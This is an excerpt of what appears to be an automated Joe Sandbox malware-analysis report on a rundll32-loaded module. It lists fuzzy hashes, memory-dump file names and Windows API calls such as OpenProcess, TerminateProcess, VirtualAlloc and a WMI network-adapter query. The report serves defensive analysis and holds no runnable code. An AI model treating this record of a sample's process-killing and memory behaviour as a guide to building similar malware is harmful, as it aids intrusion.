                                                • Opcode Fuzzy Hash: e57b5a74ef33a4f8e7c02b94979bb301ef9140516089241c3c50ce787c9cd0f2
                                                • Instruction Fuzzy Hash: FE0167B5A107154BE791CB2CD881F86B3D8EF40298F14403BF8459B715EB74F981CB96
                                                APIs
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,74DF0F00), ref: 10004FFD
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
                                                • CloseHandle.KERNEL32(00000000), ref: 10005017
                                                • CloseHandle.KERNEL32(00000000), ref: 10005024
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcess$OpenTerminate
                                                • String ID:
                                                • API String ID: 6823918-0
                                                • Opcode ID: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                                • Instruction ID: 5de784d7574f9188aa6451a23a921ffbe079856f50babf4c989d878cd4bace46
                                                • Opcode Fuzzy Hash: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                                • Instruction Fuzzy Hash: 5CE0C2713012306FF6625734AC4CBAF36D4EF0CB52F024200FA06D5186D670CC91C6E1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: strrchr
                                                • String ID: 123
                                                • API String ID: 3418686817-2286445522
                                                • Opcode ID: 237b865c981e04fbe9b07c6cb26367ff6a21c7b05088142f919ac67509ad86a0
                                                • Instruction ID: 91c88f2fdba39316f7f8c12ec317d5d5c799cc6de1d8f02641f729906415f28d
                                                • Opcode Fuzzy Hash: 237b865c981e04fbe9b07c6cb26367ff6a21c7b05088142f919ac67509ad86a0
                                                • Instruction Fuzzy Hash: 7B218CB52042042BF314C238AC46BBB3BC4DB80365F54062DFA169B1D2EDBBEA898255
                                                APIs
                                                • lstrlen.KERNEL32(00000000,?,00000000,00000000,10009F7F,?,Win32_NetworkAdapterConfiguration), ref: 100116C2
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 100116E9
                                                • GetLastError.KERNEL32(?,00000001), ref: 100116F9
                                                • GetLastError.KERNEL32(?,00000001), ref: 100116FF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ErrorLast$ByteCharMultiWidelstrlen
                                                • String ID:
                                                • API String ID: 475730466-0
                                                • Opcode ID: 74a0a33ca5c9cfc2f231fa8d56fa11b01f59c705ee89c98f7395991253ccdf2e
                                                • Instruction ID: 8a47316f605976b62342ead09f9e2ff78638c0d05c570057b729d602be0c9d28
                                                • Opcode Fuzzy Hash: 74a0a33ca5c9cfc2f231fa8d56fa11b01f59c705ee89c98f7395991253ccdf2e
                                                • Instruction Fuzzy Hash: 2B01F432504226ABD7119B60CC45BDB3FB8EF023A1F204130F804DA290E730D5A1C6A5
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00610625
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00610658
                                                Memory Dump Source
                                                • Source File: 00000007.00000003.1850079303.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_3_610000_rundll32.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction ID: b5c46f0294e5c5599113ec4cd8d7762fe15ee4307875876b292ad457f0063e86
                                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction Fuzzy Hash: 66210835A00219BFEF008F64CC45BEEFBF6FB54394F648166E910A2280E7B44A919B94